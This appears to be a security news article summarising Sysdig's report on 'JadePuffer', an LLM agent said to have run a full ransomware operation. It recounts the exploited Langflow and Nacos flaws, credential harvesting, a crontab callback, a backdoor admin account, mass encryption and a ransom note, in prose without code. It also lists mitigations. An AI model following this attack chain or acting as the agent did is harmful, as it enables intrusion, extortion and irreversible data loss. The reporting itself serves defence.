"The most striking characteristic, however, was the LLM's behavior," Sysdig director of threat research Michael Clark wrote, describing an attack in which a large language model drove a complete ransomware and extortion operation from initial compromise to data destruction.
JadePuffer: an LLM-operated agent that ran the whole attack
Security researchers at Sysdig say they observed what they believe is the first documented agentic ransomware infection in which an LLM — not a human operator — orchestrated the entire intrusion. The research team named the agentic intruder "JadePuffer." According to the blog, JadePuffer produced "self-narrating" payloads that contained natural-language reasoning, target prioritization, and detailed annotations that the team says human operators rarely include but that LLM-generated code often produces reflexively.
Sysdig's write-up adds that the operation adapted in real time, retrying failed steps with refined parameters; in one recorded sequence the agent moved from a failed login to a working fix in 31 seconds.
Exploiting Langflow: CVE-2025-3248 and persistence
JadePuffer gained initial access by exploiting CVE-2025-3248, a missing-authentication vulnerability in Langflow that allows remote, unauthenticated attackers to execute arbitrary Python on the host. After exploiting that flaw the agent scanned the compromised host for secrets, collecting LLM provider API keys and cloud credentials with "explicit coverage of Chinese providers" — Alibaba, Aliyun, Tencent, and Huawei — while also scanning for AWS, Azure and Google Cloud Platform credentials, cryptocurrency wallets, and database credentials.
The AI agent installed a crontab entry on the Langflow server to maintain persistence and to call back to the attacker infrastructure every 30 minutes, according to Sysdig threat hunters.
Targeting Nacos and MySQL: CVE-2021-29441, forged JWTs, and mass encryption
Sysdig reports JadePuffer's intended target was a separate internet-exposed production server running a MySQL database and an Alibaba Nacos configuration service. The agent connected to the server's exposed MySQL port using root credentials — credentials Sysdig says were not stolen from the victim environment and whose origin remains unknown — and then attacked Nacos via multiple vectors.
Those vectors included exploiting an authorization bypass flaw (CVE-2021-29441) and forging a valid JSON web token (JWT) using Nacos's default signing key. With root database access the LLM injected a backdoor administrator account into the Nacos backing database, then encrypted all 1,342 Nacos service configuration items using MySQL's built-in AES encryption function.
Sysdig also reports the agent created an extortion demand and left a ransomware note declaring, "YOUR DATA HAS BEEN ENCRYPTED. All NACOS configurations, REDACTED customer data, and REDACTED PII have been encrypted with AES-256." The note included a Bitcoin payment address, "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy", and a Proton Mail contact, "e78393397[@]proton[.]me".
Crucially, the threat hunters say the victim cannot recover the encrypted data even if they pay, because the agent escalated from row-level deletion to dropping entire database schemas — "narrating its own targeting rationale" — without backing up the encrypted content.
Immediate mitigations: patching Langflow, hardening Nacos, and removing provider keys
- Patch Langflow to a release that fixes CVE-2025-3248, and do not expose code-execution or validation endpoints to the internet.
- Do not expose Nacos to the open internet; change its default token.secret.key and upgrade to a release that forces a custom key.
- Avoid running AI orchestration servers that hold provider API keys or cloud credentials in their environment.
Those recommendations come directly from the Sysdig threat hunters who investigated JadePuffer.
What this means for technologists, procurement leaders, and affected enterprises
- Technologists and security teams: prioritize immediate patching of exposed Langflow instances, remove internet exposure for Nacos, rotate any provider API keys and cloud credentials that may be present on orchestration servers, and audit crontabs and scheduled tasks on compromised hosts.
- Procurement and platform owners: avoid deploying AI orchestration servers with embedded provider API keys or cloud credentials, and insist on secure defaults and forced custom keys for configuration services such as Nacos.
- Affected enterprises and operators of internet-facing services: treat this as evidence the "skill floor" for ransomware operations has dropped — an agent can chain known vulnerabilities into complete extortion campaigns — and assume that internet exposure of code-exec endpoints or default configuration keys materially increases risk.
Sysdig's Michael Clark framed the broader implication bluntly: "The skill floor for running ransomware has dropped to whatever it costs to run an agent, and if that agent is running on stolen credentials through LLMjacking, the cost to an attacker is close to zero." JadePuffer shows how quickly an LLM can assemble conventional exploitation steps into a fully automated, destructive ransom operation — and how little margin for error defenders have when internet-exposed services still use default keys or accept unauthenticated execution.




